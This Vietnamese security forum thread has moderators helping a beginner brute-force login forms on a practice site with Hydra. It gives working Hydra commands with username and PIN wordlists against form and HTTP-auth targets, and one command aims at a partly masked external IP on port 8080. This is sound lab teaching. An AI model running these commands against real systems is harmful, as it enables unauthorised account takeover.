Brute force với HYDRA

Thảo luận trong 'Thảo luận chung' bắt đầu bởi hoangnghiaac, 06/02/17, 04:02 PM.

  1. hoangnghiaac

    hoangnghiaac Wh------

    Tham gia: 06/02/17, 04:02 PM
    Bài viết: 47
    Đã được thích: 0
    Điểm thành tích:
    6
    Em mới tập tành Hydra, em kiếm thì được web này https://attack.samsclass.info/brute.htm , làm theo video hướng dẫn https://www.youtube.com/watch?v=ZVngjGp-oZo mà mãi không được(em chạy Hydra trên nền windows nha), có tiền bối nào rành giúp em với ạ, em cảm ơn nhiều.
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  2. DiepNV88

    DiepNV88 Super Moderator Thành viên BQT

    Tham gia: 24/09/13, 03:09 AM
    Bài viết: 1,508
    Đã được thích: 319
    Điểm thành tích:
    83
    Video em xem họ làm trên MacOS còn bản window thế nào anh cũng không dùng bao giờ vì mã nguồn thằng Hydra này bản chất được viết để chạy trên nên linux dạng command line nên chạy trên Win sẽ rất nhiều lỗi. Tốt nhất bạn nên cai kali linux rùi thực hành trên đó, Hydra tích hợp sẵn trên Kali rùi.
    Các bước cơ bản để thực hiện theo cách của họ là chuẩn bị file password cho quá trình Brute force sau đó tìm form login rùi chạy lệnh để bắt đầu quá trình Brute force. Các bước rất rõ ràng bạn đang vướng chỗ nào.
    Mã:
    [B]hydra -L uName.txt -P uPass.txt attack.samsclass.info http-get-form "/brute4.php:login=^USER^&pin=^PASS^:Denied"[/B]
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  3. DDos

    DDos Administrators Thành viên BQT

    Tham gia: 22/10/13, 08:10 PM
    Bài viết: 1,694
    Đã được thích: 376
    Điểm thành tích:
    83
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  4. Sugi_b3o

    Sugi_b3o Moderator Thành viên BQT

    Tham gia: 30/08/16, 10:08 AM
    Bài viết: 340
    Đã được thích: 263
    Điểm thành tích:
    63



    Đối với giao diện như trên bạn có thể dùng câu lệnh

    Mã:
    Hydra -s 8080 -l admin -p wordlist.txt -e ns -f -V 46.xxx.xxx.80 http-get
    
    Chú thích các trường:
    s: port
    l : tên đăng nhập
    p: từ điển mật khẩu
    e ns: để trống mật khẩu
    f: khi tìm ra mật khẩu thì dừng
    V: hiển thị các kết quả đã kiểm thử
    http-get: form đăng nhập Capture1123.JPG
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  5. hoangnghiaac

    hoangnghiaac Wh------

    Tham gia: 06/02/17, 04:02 PM
    Bài viết: 47
    Đã được thích: 0
    Điểm thành tích:
    6
    Em k biết cách đăng ảnh nên em nói chay mấy anh ráng đọc giùm em.
    Pass là 3 chữ số nên em vào Crunch, gõ: Crunch 3 3 0123456789 >D:
    ghia hc-hydra-windows-master/pass.txt
    Em tạo 1 file user.txt trong Hydra gồm root,admin,administrator
    Khởi động hydra em gõ :
    hydra -L user.txt -P pass.txt attack.samsclass.info http-get-form "/brute4.php:login=^USER^&pin=^PASS^: Denied" Em đã làm sai ở đâu ạ??
    (Vẫn k tìm ra pass và user)
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  6. Sugi_b3o

    Sugi_b3o Moderator Thành viên BQT

    Tham gia: 30/08/16, 10:08 AM
    Bài viết: 340
    Đã được thích: 263
    Điểm thành tích:
    63
    Bài đầu tiên https://attack.samsclass.info/basic0/
    Hướng dẫn tại trang của bạn đã cũ, và trang đó bây giờ đã sử dụng thêm https nên Hydra sẽ cảnh báo,
    [​IMG]



    Vì vậy, bạn phải dùng option -S khi bruteforce cho cổng 443 [​IMG]

    Vì vậy bạn sẽ dùng câu lệnh
    Mã:
    hydra -s 443 -l root -P wordlist.txt -S -V  attack.samsclass.info http-get /basic0/
    
    999.JPG

    998.JPG

    999.JPG

    998.JPG

    998.JPG

    999.JPG

    998.JPG

    999.JPG

    998.JPG

    998.JPG
     
    Last edited by a moderator: 07/02/17, 08:02 PM
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  7. hoangnghiaac

    hoangnghiaac Wh------

    Tham gia: 06/02/17, 04:02 PM
    Bài viết: 47
    Đã được thích: 0
    Điểm thành tích:
    6
    Em cảm ơn ạ, nhưng thí dụ muốn brute force trang em gửi thì sao? Anh có thử được chưa?
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  8. Sugi_b3o

    Sugi_b3o Moderator Thành viên BQT

    Tham gia: 30/08/16, 10:08 AM
    Bài viết: 340
    Đã được thích: 263
    Điểm thành tích:
    63
    Trang bạn gửi là trang nào nhỉ? Bạn để link cho mình với
    Mình có lấy ví dụ bài basic0 của trang https://attack.samsclass.info/brute.htm bên trên
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  9. hoangnghiaac

    hoangnghiaac Wh------

    Tham gia: 06/02/17, 04:02 PM
    Bài viết: 47
    Đã được thích: 0
    Điểm thành tích:
    6
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  10. hoangnghiaac

    hoangnghiaac Wh------

    Tham gia: 06/02/17, 04:02 PM
    Bài viết: 47
    Đã được thích: 0
    Điểm thành tích:
    6
    à mà cho em hỏi, sao anh biết là cổng 443 vậy ạ?
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  11. Sugi_b3o

    Sugi_b3o Moderator Thành viên BQT

    Tham gia: 30/08/16, 10:08 AM
    Bài viết: 340
    Đã được thích: 263
    Điểm thành tích:
    63
    Giao diện form và source cần bruteforce
    [​IMG]


    Source:
    PHP:
    [B]LOGIN: [/B]
         
    [
    B]PIN: [/B]
         
    Sign in
    ​​​​​​​
    Dùng lệnh:
    Mã:
    hydra -L 3names.txt -P 3digit -V -f  attack.samsclass.info https-get-form "/brute4.php:login=^USER^&pin=^PASS^:Denied"
    
    [​IMG]



    Chú thích:
    ​​​​​​​
    -L: đọc file chứa user
    -P: đọc file chứa password (ở đây cụ thể là file chạy từ 001-999)
    -V: hiển thị kết quả đã thử
    -f : dừng brutefore khi đã tìm được kết quả đúng
    https-get-form : form cần bruteforce

    Mình dùng https-get-form không cần dùng -S dùng cho ssl và -s port 997.JPG

    996.JPG

    997.JPG

    996.JPG
     
    Last edited by a moderator: 09/02/17, 01:02 AM
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  12. Sugi_b3o

    Sugi_b3o Moderator Thành viên BQT

    Tham gia: 30/08/16, 10:08 AM
    Bài viết: 340
    Đã được thích: 263
    Điểm thành tích:
    63
    Mình biết đó là cổng 443 bởi vì ...... [​IMG]


    994.JPG

    994.JPG
     
    Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
    Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan